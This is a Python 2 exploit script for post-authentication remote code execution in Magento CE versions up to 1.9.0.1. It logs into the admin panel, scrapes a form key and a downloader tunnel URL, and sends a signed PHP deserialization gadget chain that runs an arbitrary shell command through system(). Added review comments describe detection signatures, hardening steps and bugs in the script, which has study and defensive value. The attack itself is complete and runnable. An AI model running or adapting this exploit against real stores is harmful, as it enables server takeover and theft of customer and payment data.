  1. #!/usr/bin/env python
  2. # Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE
  3. # Google Dork: "Powered by Magento"
  4. # Date: 08/18/2015
  5. # Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com
  6. # Vendor Homepage: http://magento.com/
  7. # Software Link: https://www.magentocommerce.com/download
  8. # Version: 1.9.0.1 and below
  9. # Tested on: Ubuntu 15
  10. # CVE : none
  11.  
  12. from hashlib import md5
  13. import sys
  14. import re
  15. import base64
  16. import mechanize
  17.  
  18.  
def usage():
    """Print the command-line usage text and exit.

    Python 2 syntax (`print` statement). Two things worth knowing before
    relying on this helper:
    - the format string carries two ``%s`` placeholders but no ``%``
      operands, so the literal text "%s" is printed instead of the script
      name;
    - ``sys.exit()`` with no argument exits with status 0, even though this
      is the bad-arguments path, so a wrapper script cannot tell the two
      outcomes apart.
    """
    print "Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
    sys.exit()
  22.  
  23.  
# Script body. Python 2 throughout (print statements, str/bytes conflation in
# base64 and md5). Indentation of the pasted original was lost; the nesting
# below is reconstructed from the statement order and may differ from the
# author's file in the final print line.
if len(sys.argv) != 3:
    usage()

# Command-line args
target = sys.argv[1]
arg = sys.argv[2]

# Config.
# Credentials are hard-coded rather than taken from the command line; the
# script assumes they already work against the target's login form.
username = 'ignoreme'
password = 'SuperSecure'
php_function = 'system' # Note: we can only pass 1 argument to the function
# NOTE(review): the only value keying the `h` parameter computed below is this
# date, i.e. a value that lives in the install's local.xml. From a defender's
# side that file and its install date should be treated as a secret, and the
# /downloader endpoint restricted or removed where it is not needed (the usual
# hardening step for this product line — confirm against the vendor guidance).
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml

# POP chain to pivot into call_user_exec
# The template is a PHP-serialized object graph; the two %d/%s pairs are the
# byte length and text of php_function and of arg respectively (serialized
# strings carry an explicit length, so the lengths must stay in sync).
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
                                                                                     len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)

request = br.open(target)

# Assumes the first form on the landing page is the login form; a different
# page layout makes select_form or the field assignments below fail.
br.select_form(nr=0)
br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
br.form.fixup()
br['login[username]'] = username
br['login[password]'] = password

br.method = "POST"
request = br.submit()
content = request.read()

# Both regexes are used without checking for a miss: if the login did not
# succeed (or the page markup differs), re.search returns None and the
# .group(1) call raises AttributeError rather than a readable message.
url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)

# Same unchecked-match pattern for the tunnel URL scraped from the downloader page.
request = br.open(url + '/downloader/index.php/', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)

# Python 2: b64encode takes and returns str, so concatenation with the
# install_date str below works; under Python 3 this pairing would fail.
payload = base64.b64encode(payload)
# `h` is md5(base64 payload + install_date); presumably mirrors a server-side
# check keyed on the install date — verify against the target's tunnel handler.
gh = md5(payload + install_date).hexdigest()

# Detection note: the decisive request is a GET to the scraped tunnel URL
# carrying `ga=<base64 of a PHP-serialized object>` and `h=<32-hex md5>`. That
# parameter shape, reached right after an admin login, is what access-log
# review or a WAF rule can key on.
exploit = tunnel + '?ga=' + payload + '&h=' + gh

try:
    request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
    # NOTE(review): only HTTPError carries a response body; a plain URLError
    # (connection failure) has no read(), so this handler would itself raise
    # AttributeError in that case — confirm against the mechanize version used.
    print e.read()
print exploit